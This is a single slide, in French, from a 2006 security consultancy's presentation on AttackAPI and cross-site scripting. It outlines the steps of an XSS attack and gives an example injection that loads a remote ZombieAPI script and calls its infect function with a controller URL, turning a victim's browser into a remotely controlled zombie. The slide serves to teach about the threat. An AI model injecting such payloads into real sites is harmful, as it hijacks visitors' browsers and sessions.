B & A Consultants - Sécurité Informatique
infos@ba-cst.com - +33 (0) 563 277 241
B&A Consultants
Prestations et compétences
Documents techniques
Présentations
Norme ISO 27005
Clés USB U3
Cross site scripting, AttackAPI
Wifi, WEP et sécurité
SPF et DomainKeys
Spammeurs et MX secondaires
SPF : le DNS et l'anti-spam
Sécurité et Logiciel Libre
Wifi et Sécurité
Réflexions sur le Wifi
Insécurités applicatives
Formations
Groupes de travail
Médias et conférences
Pour nous contacter
AttackAPI et le Cross-Site Scripting
En grandeur nature…
Sommaire - Page précédente - Version graphique - Page suivante

En grandeur nature…





   Trouver une faille XSS sur un site

   Y amener la future victime (mail, page Web appropriée, etc.)

   En injectant le bon code dans la faille.

   Exemple :

   <script src=http://…/ZombieAPI.js></script>

   <script>ZombieAPI.Zombie.infect(URL du contrôleur,5000);</script>

Sommaire - Page précédente - Version graphique - Page suivante

(C) B & A Consultants 2006 - Reproduction interdite - Pierre-Yves Bonnetain
B&A ConsultantsPrestations et compétencesDocuments techniquesPrésentationsFormationsGroupes de travailMédias et conférencesPour nous contacter
(C) B&A Consultants 1996-2009 - infos[AT]ba-cst.com - +33 (0) 563 277 241